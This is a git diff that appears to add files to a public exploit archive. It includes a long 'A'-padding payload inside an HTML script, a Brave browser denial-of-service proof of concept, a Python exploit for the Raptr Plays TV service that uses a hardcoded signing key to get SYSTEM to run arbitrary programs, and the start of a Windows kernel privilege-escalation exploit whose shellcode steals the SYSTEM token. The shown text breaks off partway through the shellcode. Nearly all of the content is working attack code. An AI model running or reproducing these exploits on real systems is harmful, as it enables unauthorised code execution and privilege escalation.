AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
+</script>
+</html>
\ No newline at end of file
diff --git a/exploits/windows/local/44475.txt b/exploits/windows/local/44475.txt
new file mode 100644
index 000000000..4f96944a8
--- /dev/null
+++ b/exploits/windows/local/44475.txt
@@ -0,0 +1,28 @@
+# Exploit Title:Brave Browser < 0.13.0 Denial of Service (resource consumption) via a window.close(self) js code.
+# Date: 2017-10-16
+# Exploit Author: Sahil Tikoo
+# Vendor Homepage: https://brave.com
+# Software Link: https://github.com/brave/browser-laptop
+# Version: 0.12.5
+# Tested on: Kali Linux,Ubuntu ,Windows OS
+# CVE : CVE-2016-10718
+
+<html>
+<title>Brave Window Object Remote Denial of Service.</title>
+<head></head>
+
+<body><br><br>
+<h1><center>Brave Window Object Remote Denial of Service</center></h1><br><br>
+<h2><center>Proof of Concept</center></br></br> </h2>
+
+<center>
+<b>Click the below link to Trigger the Vulnerability..</b><br><br>
+<hr></hr>
+
+<hr></hr>
+<b><center><a href="javascript:window.close(self);">Brave Window Object DoS Test POC</a></center>
+
+</center>
+</body>
+
+</html>
\ No newline at end of file
diff --git a/exploits/windows/local/44476.py b/exploits/windows/local/44476.py
new file mode 100755
index 000000000..5f5fb9e17
--- /dev/null
+++ b/exploits/windows/local/44476.py
@@ -0,0 +1,88 @@
+########################################################################
+#  http://support.amd.com/en-us/download?cmpid=CCCOffline - 
+#  Click "Automatically Detect - Download Now"
+#  Installation Automatically Installs "Raptr, Inc Plays TV Service"
+#
+#  OR
+#
+#  https://plays.tv/download
+#
+#  Target OS:   Windows( Any )
+#  Privilege:   SYSTEM
+#  Type:        Arbitrary File Execution
+#
+#  Notes:       Second minor bug allows for arbitrary file write of 
+#               uncontrolled data using the /extract_files path.
+#
+########################################################################
+
+#!/usr/bin/python3
+import urllib.request
+import json
+import hashlib
+
+def check_svc( path, data ):
+      
+  #Setup request
+  request = urllib.request.Request(addr)
+
+  #add post data
+  try:
+    resp = urllib.request.urlopen(request, "data".encode("utf-8"))
+    return "[-] Not Raptr, Plays TV service"
+  except urllib.error.HTTPError as err:
+    error_message = err.read().decode("utf-8")
+    if error_message == 'Security failed - Missing hash or message[data]':
+        return "[+] Raptr, Plays TV service"
+
+def post_req( path, data ):
+  
+  secret_key = 'a%qs0t33QgiE6ut^0I&Y'
+    
+  #Setup request
+  request = urllib.request.Request(addr)
+  json_data = json.dumps(data)
+  
+  m = hashlib.md5()
+  hash_data = path + json_data + secret_key
+  m.update(hash_data.encode('utf8'))
+  hash_str = m.hexdigest()
+  
+  #add post data
+  p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")
+  resp = urllib.request.urlopen(request, p_data)
+  return resp.read()
+
+#Target IP address
+ip = '127.0.0.1'
+
+##############################################################
+# The service binds to an ephemeral port defined at
+# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service] 
+##############################################################
+port = 50452
+
+##############################################################
+# The service calls CreateProcess with the following format: 
+# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
+#
+# One way to achieving remote code execution is to use SMB
+# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"
+##############################################################
+cmd = "C:\\Windows\\System32\\calc.exe"       #Local Execution
+data = {
+  "installer": cmd,
+  "appdata": cmd
+}
+
+#Set url
+path = '/execute_installer'
+addr = 'http://' + ip + ':' + str(port) + path
+
+#Check if the remote service is a Raptr Plays TV svc
+#ret = check_svc(data, path)
+#print(ret)
+
+#Exploit service
+ret = post_req(path, data)
+print(ret)
\ No newline at end of file
diff --git a/exploits/windows_x86/local/44478.cpp b/exploits/windows_x86/local/44478.cpp
new file mode 100644
index 000000000..172cf36d7
--- /dev/null
+++ b/exploits/windows_x86/local/44478.cpp
@@ -0,0 +1,558 @@
+#include <Windows.h>
+#include <wingdi.h>
+#include <iostream>
+#include <Psapi.h>
+#pragma comment(lib, "psapi.lib")
+
+#define POCDEBUG 0
+
+#if POCDEBUG == 1
+#define POCDEBUG_BREAK() getchar()
+#elif POCDEBUG == 2
+#define POCDEBUG_BREAK() DebugBreak()
+#else
+#define POCDEBUG_BREAK()
+#endif
+
+static PVOID(__fastcall *pfnHMValidateHandle)(HANDLE, BYTE) = NULL;
+
+static constexpr UINT num_PopupMenuCount = 2;
+static constexpr UINT num_WndShadowCount = 3;
+static constexpr UINT num_NtUserMNDragLeave = 0x11EC;
+static constexpr UINT num_offset_WND_pcls = 0x64;
+
+static HMENU hpopupMenu[num_PopupMenuCount] = { 0 };
+static UINT  iMenuCreated  = 0;
+static BOOL  bDoneExploit  = FALSE;
+static DWORD popupMenuRoot = 0;
+static HWND  hWindowMain   = NULL;
+static HWND  hWindowHunt   = NULL;
+static HWND  hWindowList[0x100] = { 0 };
+static UINT  iWindowCount  = 0;
+static PVOID pvHeadFake = NULL;
+static PVOID pvAddrFlags = NULL;
+
+typedef struct _HEAD {
+    HANDLE  h;
+    DWORD   cLockObj;
+} HEAD, *PHEAD;
+
+typedef struct _THROBJHEAD {
+    HEAD    head;
+    PVOID   pti;
+} THROBJHEAD, *PTHROBJHEAD;
+
+typedef struct _DESKHEAD {
+    PVOID   rpdesk;
+    PBYTE   pSelf;
+} DESKHEAD, *PDESKHEAD;
+
+typedef struct _THRDESKHEAD {
+    THROBJHEAD  thread;
+    DESKHEAD    deskhead;
+} THRDESKHEAD, *PTHRDESKHEAD;
+
+typedef struct _SHELLCODE {
+    DWORD reserved;
+    DWORD pid;
+    DWORD off_CLS_lpszMenuName;
+    DWORD off_THREADINFO_ppi;
+    DWORD off_EPROCESS_ActiveLink;
+    DWORD off_EPROCESS_Token;
+    PVOID tagCLS[0x100];
+    BYTE  pfnWindProc[];
+} SHELLCODE, *PSHELLCODE;
+
+static PSHELLCODE pvShellCode = NULL;
+
+// Arguments:
+// [ebp+08h]:pwnd   = pwndWindowHunt;
+// [ebp+0Ch]:msg    = 0x9F9F;
+// [ebp+10h]:wParam = popupMenuRoot;
+// [ebp+14h]:lParam = NULL;
+// In kernel-mode, the first argument is tagWND pwnd.
+static
+BYTE
+xxPayloadWindProc[] = {
+    // Loader+0x108a:
+    // Judge if the `msg` is 0x9f9f value.
+    0x55,                               // push    ebp
+    0x8b, 0xec,                         // mov     ebp,esp
+    0x8b, 0x45, 0x0c,                   // mov     eax,dword ptr [ebp+0Ch]
+    0x3d, 0x9f, 0x9f, 0x00, 0x00,       // cmp     eax,9F9Fh
+    0x0f, 0x85, 0x8d, 0x00, 0x00, 0x00, // jne     Loader+0x1128
+    // Loader+0x109b:
+    // Judge if CS is 0x1b, which means in user-mode context.
+    0x66, 0x8c, 0xc8,                   // mov     ax,cs
+    0x66, 0x83, 0xf8, 0x1b,             // cmp     ax,1Bh
+    0x0f, 0x84, 0x80, 0x00, 0x00, 0x00, // je      Loader+0x1128
+    // Loader+0x10a8:
+    // Get the address of pwndWindowHunt to ECX.
+    // Recover the flags of pwndWindowHunt: zero bServerSideWindowProc.
+    // Get the address of pvShellCode to EDX by CALL-POP.
+    // Get the address of pvShellCode->tagCLS[0x100] to ESI.
+    // Get the address of popupMenuRoot to EDI.
+    0xfc,                               // cld
+    0x8b, 0x4d, 0x08,                   // mov     ecx,dword ptr [ebp+8]
+    0xff, 0x41, 0x16,                   // inc     dword ptr [ecx+16h]
+    0x60,                               // pushad
+    0xe8, 0x00, 0x00, 0x00, 0x00,       // call    $5
+    0x5a,                               // pop     edx
+    0x81, 0xea, 0x43, 0x04, 0x00, 0x00, // sub     edx,443h
+    0xbb, 0x00, 0x01, 0x00, 0x00,       // mov     ebx,100h
+    0x8d, 0x72, 0x18,                   // lea     esi,[edx+18h]
+    0x8b, 0x7d, 0x10,                   // mov     edi,dword ptr [ebp+10h]
+    // Loader+0x10c7:
+    0x85, 0xdb,                         // test    ebx,ebx
+    0x74, 0x13,                         // je      Loader+0x10de
+    // Loader+0x10cb:
+    // Judge if pvShellCode->tagCLS[ebx] == NULL
+    0xad,                               // lods    dword ptr [esi]
+    0x4b,                               // dec     ebx
+    0x83, 0xf8, 0x00,                   // cmp     eax,0
+    0x74, 0xf5,                         // je      Loader+0x10c7
+    // Loader+0x10d2:
+    // Judge if tagCLS->lpszMenuName == popupMenuRoot
+    0x03, 0x42, 0x08,                   // add     eax,dword ptr [edx+8]
+    0x39, 0x38,                         // cmp     dword ptr [eax],edi
+    0x75, 0xee,                         // jne     Loader+0x10c7
+    // Loader+0x10d9:
+    // Zero tagCLS->lpszMenuName
+    0x83, 0x20, 0x00,                   // and     dword ptr [eax],0
+    0xeb, 0xe9,                         // jmp     Loader+0x10c7
+    // Loader+0x10de:
+    // Get the value of pwndWindowHunt->head.pti->ppi->Process to ECX.
+    // Get the value of pvShellCode->pid to EAX.
+    0x8b, 0x49, 0x08,                   // mov     ecx,dword ptr [ecx+8]
+    0x8b, 0x5a, 0x0c,                   // mov     ebx,dword ptr [edx+0Ch]
+    0x8b, 0x0c, 0x0b,                   // mov     ecx,dword ptr [ebx+ecx]
+    0x8b, 0x09,                         // mov     ecx,dword ptr [ecx]
+    0x8b, 0x5a, 0x10,                   // mov     ebx,dword ptr [edx+10h]
+    0x8b, 0x42, 0x04,                   // mov     eax,dword ptr [edx+4]
+    0x51,                               // push    ecx
+    // Loader+0x10f0:
+    // Judge if EPROCESS->UniqueId == pid.
+    0x39, 0x44, 0x0b, 0xfc,             // cmp     dword ptr [ebx+ecx-4],eax
+    0x74, 0x07,                         // je      Loader+0x10fd
+    // Loader+0x10f6:
+    // Get next EPROCESS to ECX by ActiveLink.
+    0x8b, 0x0c, 0x0b,                   // mov     ecx,dword ptr [ebx+ecx]
+    0x2b, 0xcb,                         // sub     ecx,ebx
+    0xeb, 0xf3,                         // jmp     Loader+0x10f0
+    // Loader+0x10fd:
+    // Get current EPROCESS to EDI.
+    0x8b, 0xf9,                         // mov     edi,ecx
+    0x59,                               // pop     ecx
+    // Loader+0x1100:
+    // Judge if EPROCESS->UniqueId == 4
+    0x83, 0x7c, 0x0b, 0xfc, 0x04,       // cmp     dword ptr [ebx+ecx-4],4
+    0x74, 0x07,                         // je      Loader+0x110e
+    // Loader+0x1107:
+    // Get next EPROCESS to ECX by ActiveLink.
+    0x8b, 0x0c, 0x0b,                   // mov     ecx,dword ptr [ebx+ecx]
+    0x2b, 0xcb,                         // sub     ecx,ebx
+    0xeb, 0xf2,                         // jmp     Loader+0x1100
+    // Loader+0x110e:
+    // Get system EPROCESS to ESI.
+    // Get the value of system EPROCESS->Token to current EPROCESS->Token.
+    // Add 2 to OBJECT_HEADER->PointerCount of system Token.
+    // Return 0x9F9F to the caller.
+    0x8b, 0xf1,                         // mov     esi,ecx
